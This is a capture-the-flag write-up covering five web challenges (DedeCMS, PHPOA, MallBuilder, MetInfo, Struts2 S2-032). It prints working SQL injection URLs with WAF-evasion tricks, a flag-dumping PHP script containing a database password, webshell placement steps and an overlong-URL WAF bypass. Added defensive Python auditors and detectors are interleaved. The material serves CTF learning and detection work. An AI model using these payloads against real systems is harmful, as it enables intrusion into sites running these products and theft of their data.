by student

| Challenge | Score | Address |
|---|---|---|
| MallBuilder2 | 350 | mall.anquanbao.com.cn |
| MallBuilder1 | 200 | mall.anquanbao.com.cn |
| DedeCMS2 | 300 | cms.anquanbao.com.cn |
| DedeCMS1 | 200 | cms.anquanbao.com.cn |
| MetInfo2 | 300 | info.anquanbao.com.cn |
| MetInfo1 | 200 | info.anquanbao.com.cn |
| PHPOA2 | 200 | oa.anquanbao.com.cn |
| PHPOA1 | 150 | oa.anquanbao.com.cn |
| BugScan1 | 500 | scan.anquanbao.com.cn |
0x01 Dedecms
First up was DedeCMS. Logging in directly with admin / 123456 worked, but the left-hand admin menu was blank.
The file manager could still be reached directly by URL:
/dede/file_manage_main.php?activepath=/uploads
The first flag was in the web root. Seeing that other teams were already at 750 points, we went looking for the next flag.txt and ended up with three flags.
Upload and similar functions were unusable, so a .pht file was written directly and it worked immediately. The server was painfully laggy, though: a one-line shell would not even connect, so a full webshell was dropped instead. The database configuration file was located, but turned out to be unreadable. While stuck on that, we found that flag.txt had been deleted and the admin password changed; someone else had modified the backend and deleted a lot of important files.
Eventually we noticed the file permissions were 777, renamed the config file to .txt, and read the configuration that way.
The WAF, however, was strong.
We could log in to the database and see the table dede_flag, but could not read its data, so we simply wrote a PHP file to read it.
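Two of the weaknesses in this section are things a defender can audit for mechanically: a configuration file left world-writable (777), and a PHP-executable file such as .pht sitting under an upload directory. The script below is an added example written for this writeup, not code from the challenge or from DedeCMS; it assumes a web root layout with an `uploads/` directory and an Apache-style handler mapping in which the listed extensions reach the PHP interpreter. The sample tree it audits is constructed in a temporary directory.

```python
import stat
import tempfile
from pathlib import Path

# Extensions a typical Apache+PHP setup hands to the interpreter (assumption;
# check the real handler mapping). None of these belong under an upload path.
PHP_LIKE_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".pht", ".phar"}


def is_world_writable(mode: int) -> bool:
    """True when the 'other' write bit is set (e.g. 0o777, 0o666)."""
    return bool(mode & stat.S_IWOTH)


def audit_webroot(webroot: str, upload_dirs=("uploads",)) -> list:
    """Walk a web root and return sorted (relative_path, finding) pairs."""
    root = Path(webroot)
    upload_roots = [root / d for d in upload_dirs]
    findings = []
    for path in root.rglob("*"):
        rel = path.relative_to(root).as_posix()
        # lstat so a symlink's own mode is reported, not its target's
        if is_world_writable(path.lstat().st_mode):
            findings.append((rel, "world-writable"))
        if (path.is_file() and path.suffix.lower() in PHP_LIKE_EXTENSIONS
                and any(up in path.parents for up in upload_roots)):
            findings.append((rel, "php-executable file under upload dir"))
    return sorted(findings)


def build_demo_webroot(base: str) -> str:
    """Constructed sample tree reproducing the two misconfigurations (not the real site)."""
    root = Path(base) / "webroot"
    for d in ("data", "uploads"):
        (root / d).mkdir(parents=True)
        (root / d).chmod(0o755)
    files = {
        "index.php": ("<?php echo 'ok'; ?>", 0o644),
        # the 777 config file from the writeup; credential is a placeholder
        "data/config.php": ("<?php $cfg_dbpwd = 'PLACEHOLDER'; ?>", 0o777),
        "uploads/logo.png": ("not really a png", 0o644),
        "uploads/unexpected.pht": ("<?php /* should never be here */ ?>", 0o644),
    }
    for rel, (content, mode) in files.items():
        p = root / rel
        p.write_text(content)
        p.chmod(mode)
    return str(root)


def run_demo() -> list:
    """Build the sample tree, audit it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_webroot(build_demo_webroot(tmp))


if __name__ == "__main__":
    for rel, finding in run_demo():
        print(f"{finding:40} {rel}")
```

Run against a real web root, the same function would list every world-writable path and every interpreter-reachable file under the upload directories; both lists should be empty on a hardened install, and a non-empty second list is a strong indicator that an upload filter has already been bypassed.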
0x02 Phpoa
This one had an existing WooYun case with a script: arbitrary file upload. A full webshell went straight in; this database could be read directly, so we read it and then wrote a PHP file to pull the flag out of the database.
Case link:
http://www.wooyun.org/bugs/wooyun-2010-163275
By the time of writing this writeup, the method above no longer worked, since a lot of things are now filtered, but a one-line shell could still be uploaded and then driven over POST.
Then write a file to read the flag.
getflag.php
<?php
// Connect with the database credentials found in the application's configuration
$con = mysql_connect("localhost", "root", "2C2984BG");
$db_selected = mysql_select_db("flag", $con);
$sql = "SELECT * FROM flag";
$result = mysql_query($sql, $con);
// Dump every row of the flag table
while ($row = mysql_fetch_array($result)) {
    var_dump($row);
}
mysql_free_result($result);
mysql_close($con);
?>
0x03 Mallbuilder
This time flag.txt could not be accessed directly (405); switching the request to POST bypassed that.
Searching WooYun turned up a MallBuilder SQL injection in the brand parameter:
http://www.wooyun.org/bugs/wooyun-2010-0176842
But it could only read files, and however we tried, the WAF could not be bypassed; Anquanbao is tough, everything came back 405.
Then another article turned up, using a decimal number to bypass the space filter:
http://wooyun.org/bugs/wooyun-2010-0157857
http://mall.anquanbao.com.cn/?orderby=1&s=list&m=product&brand=x ' and 1=2.11111order by 44%23
Final payload:
http://mall.anquanbao.com.cn/?orderby=1&s=list&m=product&brand=x ' and 1=2.2union%0aselect%0a 1,2,3,4,5,(select name from flag),7,8,9,10,user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44%23
0x04 Metinfo
MetInfo 5.2.4. This one is a WooYun case: "MetInfo latest version (5.2.4) SQL blind injection".
http://www.wooyun.org/bugs/wooyun-2014-055338
The simplest approach: change the table name to flag and download the Excel export, which then opens as the flag, because flag has been set as the table name ... Orz
http://info.anquanbao.com.cn//admin/content/feedback/export.php?met_parameter_1=flag--;&class1=1&settings_arr[0][columnid]=1&settings_arr[0][name]=met_parameter
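The two injections above (the MallBuilder brand parameter and the MetInfo table-name parameter) both slipped past a filter that keyed on spaces: `2.2union` glues a keyword to a number, `%0a` substitutes a newline, and `--;` terminates the statement. The detector below is an added example, not code from the writeup or from either product. Instead of searching for whitespace-separated words it lexes each decoded parameter value into identifiers, numbers and single punctuation characters, so the evasions in this writeup fall apart into ordinary tokens. The request lines it inspects are constructed to mirror the URL shapes above, not copied from real logs, and the `;` in the MetInfo-style sample is percent-encoded so that `parse_qsl` treats it as part of the value on every Python version.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Lexer: identifiers, numbers with an optional decimal part, then any other
# non-space character on its own. Whitespace (including a decoded %0a) is
# skipped, and "2.2union" splits into "2.2" and "union".
TOKEN_RE = re.compile(r"[A-Za-z_]+|\d+(?:\.\d+)?|\S")
NUMBER_RE = re.compile(r"^\d+(?:\.\d+)?$")


def tokenize(value: str) -> list:
    """Lower-case, decode once more (catches double encoding), and lex."""
    return TOKEN_RE.findall(unquote(value).lower())


def classify(tokens: list) -> set:
    """Apply token-level rules and return the set of rule names that fired."""
    findings = set()
    for i, tok in enumerate(tokens):
        # UNION followed closely by SELECT, whatever separated them originally
        if tok == "union" and "select" in tokens[i + 1:i + 4]:
            findings.add("union-select")
        # AND/OR <number> = <number>: the boolean probe used to open the injection
        if (tok in ("and", "or") and i + 3 < len(tokens)
                and NUMBER_RE.match(tokens[i + 1]) and tokens[i + 2] == "="
                and NUMBER_RE.match(tokens[i + 3])):
            findings.add("boolean-test")
        # # (from %23), ; or -- used to cut off the rest of the original query
        if tok in ("#", ";") or (tok == "-" and tokens[i + 1:i + 2] == ["-"]):
            findings.add("comment-or-statement-terminator")
    # An odd number of quotes means a string literal was broken out of
    if tokens.count("'") % 2 == 1:
        findings.add("unbalanced-quote")
    return findings


def analyze_request(target: str) -> dict:
    """Return {parameter: sorted findings} for every query parameter that trips a rule."""
    results = {}
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        found = classify(tokenize(value))
        if found:
            results.setdefault(name, set()).update(found)
    return {k: sorted(v) for k, v in results.items()}


# Constructed request targets modelled on the URL shapes in the writeup.
MALLBUILDER_STYLE = ("/?orderby=1&s=list&m=product&brand=x%20%27%20and%201=2.2union%0aselect%0a"
                     "1,2,(select%20name%20from%20flag),4%23")
METINFO_STYLE = "/admin/content/feedback/export.php?met_parameter_1=flag--%3B&class1=1"
BENIGN = "/?orderby=1&s=list&m=product&brand=acme"

if __name__ == "__main__":
    for target in (MALLBUILDER_STYLE, METINFO_STYLE, BENIGN):
        print(target[:60], "->", analyze_request(target) or "clean")
```

The quote rule is deliberately the weakest of the four: a legitimate brand such as O'Neil also produces one quote, so on its own it should lower confidence rather than block, while `union-select` or `boolean-test` combined with a terminator is a much stronger signal.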
0x05 Bugscan
This one was first tried at random: tomcat/7.0.68. Found this:
http://scan.anquanbao.com.cn/memoedit.action
Guessed it was Struts2; testing with tools confirmed S2-032, but the WAF intercepted the command execution.
Tried a lot of bypass approaches and every one of them was intercepted, which was remarkable. In the end, out of options, we fell back on the most traditional method: pushing past with an overlong URL (1,000,000+ characters). The flag is under the root directory.
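The bypass that finally worked here relies on the inspecting device giving up on a request far longer than anything the application would ever legitimately receive. The script below is an added example for this writeup, not code from the challenge or from Struts; it runs over constructed access-log lines in a combined-log style and flags a request when its target exceeds a hard cap, or is a large multiple of the median length seen for that same endpoint, with an extra tag when the endpoint is a `.action` handler. The padded sample is 20,000 characters rather than the 1,000,000+ of the real case; the thresholds behave the same way.

```python
import re
from statistics import median
from urllib.parse import urlsplit

# Combined-style access log line (constructed format; adapt the regex to the
# log format actually in use).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\d+|-)'
)

HARD_CAP = 8192      # assumption: request-line limit many servers and WAFs default to
OUTLIER_RATIO = 10   # flag targets more than 10x the endpoint's median length
MIN_BASELINE = 64    # floor so very short endpoints do not trip on modest variation


def parse_line(line: str):
    """Return the named fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def endpoint_of(target: str) -> str:
    """Path component only, so query-string variations share one baseline."""
    return urlsplit(target).path.lower()


def find_oversized(lines, hard_cap=HARD_CAP, ratio=OUTLIER_RATIO) -> list:
    """Return one alert dict per request whose target length is anomalous."""
    records = [r for r in map(parse_line, lines) if r]
    lengths = {}
    for r in records:
        lengths.setdefault(endpoint_of(r["target"]), []).append(len(r["target"]))
    baseline = {ep: max(median(v), MIN_BASELINE) for ep, v in lengths.items()}
    alerts = []
    for r in records:
        ep = endpoint_of(r["target"])
        n = len(r["target"])
        reasons = []
        if n > hard_cap:
            reasons.append("over-hard-cap")
        if n > ratio * baseline[ep]:
            reasons.append("outlier-vs-endpoint-median")
        if reasons and ep.endswith(".action"):
            reasons.append("struts-action-endpoint")
        if reasons:
            alerts.append({"ip": r["ip"], "endpoint": ep, "length": n, "reasons": reasons})
    return alerts


# Constructed sample: three ordinary hits on the action endpoint and one whose
# query string has been padded to 20,000 characters. IPs are documentation ranges.
PADDED_TARGET = "/memoedit.action?pad=" + "x" * 20000
SAMPLE_LOG = [
    '198.51.100.4 - - [01/Jan/2016:10:00:01 +0800] "GET /memoedit.action HTTP/1.1" 200 1523',
    '198.51.100.4 - - [01/Jan/2016:10:00:02 +0800] "GET /index.jsp HTTP/1.1" 200 4010',
    '198.51.100.9 - - [01/Jan/2016:10:00:03 +0800] "POST /memoedit.action HTTP/1.1" 302 0',
    '203.0.113.7 - - [01/Jan/2016:10:00:04 +0800] "GET /memoedit.action?id=7 HTTP/1.1" 200 1601',
    f'203.0.113.7 - - [01/Jan/2016:10:00:05 +0800] "GET {PADDED_TARGET} HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for alert in find_oversized(SAMPLE_LOG):
        print(alert["ip"], alert["endpoint"], alert["length"], ",".join(alert["reasons"]))
```

The per-endpoint median matters more than the hard cap in practice: an inspection device that silently stops examining requests past some size will let a 9 KB request through just as readily as a 1 MB one, so the useful question is not "is it big" but "is it far larger than this handler ever sees", and the 200 status on the padded request is the second thing to check, since a server that accepted the oversized request-line is exactly the condition the writeup exploited.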
© This article is original to "Security Think Tank"; when reproducing it, please credit the source.
"Security Think Tank": 48H Flag War all-levels writeup (walkthrough)